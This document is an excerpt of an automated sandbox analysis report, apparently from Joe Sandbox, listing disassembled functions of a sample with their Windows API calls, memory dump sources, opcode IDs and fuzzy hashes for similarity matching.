                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45E0E650F1D64B42FF967BF2A84517912D16FA4741B445034DD0DC7AD2DE2C64478211
                                                                                                                                                                                                                          Function 00007FF641F39E68 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,00007FF641F39CE5,?,?,00000000,00007FF641F39D9A), ref: 00007FF641F39ED6
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF641F39CE5,?,?,00000000,00007FF641F39D9A), ref: 00007FF641F39EE0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                          • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                          • Instruction ID: 18d8f464eb712e42b4cd5932d4cba0afad96f0a6332c24223da145e9c2c84669
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26218421F1CA4A41FFD6B765A55037D22D16F84B90F045235D96EC7FD2CE6CA4838312
                                                                                                                                                                                                                          Function 00007FF8B830DCF0 Relevance: 2.6, APIs: 2, Instructions: 50memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF8B83134C9,?,?,?,00007FF8B83539B1,?,?,?,?,00007FF8B83178EA,?,?,?), ref: 00007FF8B830DD38
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2281800474.00007FF8B8300000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282199485.00007FF8B83EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282289251.00007FF8B83F2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8b8300000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                          • Opcode ID: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                                                                                                                                                          • Instruction ID: efeb553a2444813e880bdb101838b2b1a0573efb175e40619d1ddb9187c13cbc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27d2ecc8a82d26b6ee3a94a029cf6d96569e999f53c42dbd91e108040fe652f2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1118C20A1974685FA549BAD98603B9A390AF8CFD0F0C5234DB1E8B3D5DF2DF4528748
                                                                                                                                                                                                                          Function 00007FF8B831C998 Relevance: 2.5, APIs: 2, Instructions: 46COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FF8B831C80C), ref: 00007FF8B831C9C4
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FF8B831C80C), ref: 00007FF8B831CA19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2281800474.00007FF8B8300000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282199485.00007FF8B83EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282289251.00007FF8B83F2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8b8300000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                          • Opcode ID: 0291edbe3082b304451f4ed1c39b7bd1e6a79d51fcd4033be8e3744c9ea70ef5
                                                                                                                                                                                                                          • Instruction ID: 7fae1d130ce2059e9178752edc49cd877838ffba3e091d2b0863c26b0241c62a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0291edbe3082b304451f4ed1c39b7bd1e6a79d51fcd4033be8e3744c9ea70ef5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E112B71918A8286E351DF1DA89017A63A4EB48BC0F5C0435EB4D876A1DF7CE8538788
                                                                                                                                                                                                                          Function 00007FF8B831C7F0 Relevance: 2.5, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF8B831C7FD
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B831C998: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FF8B831C80C), ref: 00007FF8B831C9C4
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B831C998: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,00007FF8B831C80C), ref: 00007FF8B831CA19
                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF8B831C823
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B831C93C: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF8B831C95C
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B831C838: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF8B831C89A
                                                                                                                                                                                                                            • Part of subcall function 00007FF8B831C838: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF8B831C8B0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2281800474.00007FF8B8300000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282199485.00007FF8B83EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282289251.00007FF8B83F2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8b8300000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$FileHandleInfoStartupType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2762830733-0
                                                                                                                                                                                                                          • Opcode ID: ec87571a4dd4f9888bb3e403b7d3050c44f51055bcf036c43b695e8927277bbf
                                                                                                                                                                                                                          • Instruction ID: e11afa04e7d3de29e8b141ca91665fe174705e796cba1572a47078a4e5182b4d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec87571a4dd4f9888bb3e403b7d3050c44f51055bcf036c43b695e8927277bbf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48E0EC50E1894289FA14BBBA98A11BA63509F6D791F8C2035CA0E86191EF1DA48BC718
                                                                                                                                                                                                                          Function 00007FF641F3B1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                          • Instruction ID: 64365f96931cb2c451636e70aff85413b8bedb6a02fa4cc2de25a6efade4bcc6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C41AF3291C20987EBA6BA15A55127D77E0EB56B80F140235DA9EC3ED1CF3CE503C756
                                                                                                                                                                                                                          Function 00007FF641F276A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                          • Opcode ID: a9da83c141082f08115ad22b4370cca16ef0e782ad9c9d62d2bbd5e3e3d9cb35
                                                                                                                                                                                                                          • Instruction ID: 3f086e65600b20e03500ef904a5dbef6a2004e48846e8129eb9d9d4868561cb1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9da83c141082f08115ad22b4370cca16ef0e782ad9c9d62d2bbd5e3e3d9cb35
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9218221B1CA9245FB96BB16A9043FAA681BF55BD4F884530DD0D8B7C6CE7EE043C600
                                                                                                                                                                                                                          Function 00007FF641F3AC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                          • Instruction ID: 3270407dd56f64c00c935922f4ac2cbafab8db6ed8d18d3db663aca53ca8f847
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4431A121A1CA5A82F793BB96D84137D66D0AB50BA0F510235DA2DC3BD2CF7CE4438722
                                                                                                                                                                                                                          Function 00007FF641F38C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                          • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                          • Instruction ID: 1f5bcc6df5c3e40c86d574032baebb5652bf917652ab7c4211864aca8764092f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0218D32A19A098AEBA6BF64C4442AC33E0FB04358F84063AD61C97FD5DF3CE446C741
                                                                                                                                                                                                                          Function 00007FF641F352A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                          • Instruction ID: 7803e39f6ace7022cd1eccb51aab0a5d076872be9ff92db3339b82ee7bbefd87
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE114D21A1D68982EBE2BF51D40127EA2E4BF95B80F444531EA4CD7EE6CE7CE5438742
                                                                                                                                                                                                                          Function 00007FF641F45664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                          • Instruction ID: 0b4993eadb240eff9e31308cc93efaad151c2ca3aa4cd811f2099f78eab10ac3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6721657261CA8686DBA2BF18E54037976E0EB94B94F544234E65D876E9DF3CE4028B00
                                                                                                                                                                                                                          Function 00007FF641F2F6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                          • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                          • Instruction ID: 1fca188380d8d8cbf2d343f46a9169c3744e155c63fe5170bf0f38dd6ecf2326
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D01E121A1C78641EB86FB5299000A9A6D4BB95FE0F484230DE6CC3FD6DE3DE1038300
                                                                                                                                                                                                                          Function 00007FF8B83176F0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2281899798.00007FF8B8301000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8B8300000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2281800474.00007FF8B8300000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282049596.00007FF8B83B5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282199485.00007FF8B83EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2282289251.00007FF8B83F2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff8b8300000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __vcrt_initialize_locks__vcrt_initialize_winapi_thunks
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2444027679-0
                                                                                                                                                                                                                          • Opcode ID: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                                                                          • Instruction ID: ef6b4eab6556568d4ed8887d9687d7f963a82f9b3ea5fd4c553fa640225c149f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 267e1e33e985904d0087cc8bc5e2fb633dc7a44b110c5dfb642aea7bba0d9fe0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08114921E09A0281FE615B2CE5903B96290AF08BE0F5C4139DB6D027D5DF2CF842C308
                                                                                                                                                                                                                          Function 00007FF641F281A0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF641F286B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF641F23FA4,00000000,00007FF641F21925), ref: 00007FF641F286E9
                                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(?,00007FF641F25C06,?,00007FF641F2308E), ref: 00007FF641F281C2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_21_2_7ff641f20000_58B.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2592636585-0
                                                                                                                                                                                                                          • Opcode ID: ace902ef65350b9af860533caa3ca60103021c1a22cf1c7a98076d3fe7d09f40
                                                                                                                                                                                                                          • Instruction ID: f3434b07aaf472aac4bbe55ffb6a6ca010552c6c3f0cc91dcf095118e4f25d24
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ace902ef65350b9af860533caa3ca60103021c1a22cf1c7a98076d3fe7d09f40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01D0C211F2868581FB95BBB7BA465796591AFC9BC0F888034EE1C43B96DC3CC0820B04
                                                                                                                                                                                                                          Function 00007FF641F3C90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF641F2FFB0,?,?,?,00007FF641F3161A,?,?,?,?,?,00007FF641F32E09), ref: 00007FF641F3C94A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000015.00000002.2280465359.00007FF641F21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF641F20000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280433309.00007FF641F20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280533827.00007FF641F4B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280589044.00007FF641F63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000015.00000002.2280722102.00007FF641F66000.00000002.00000001.01000000.0000000C.sdmpDownload File
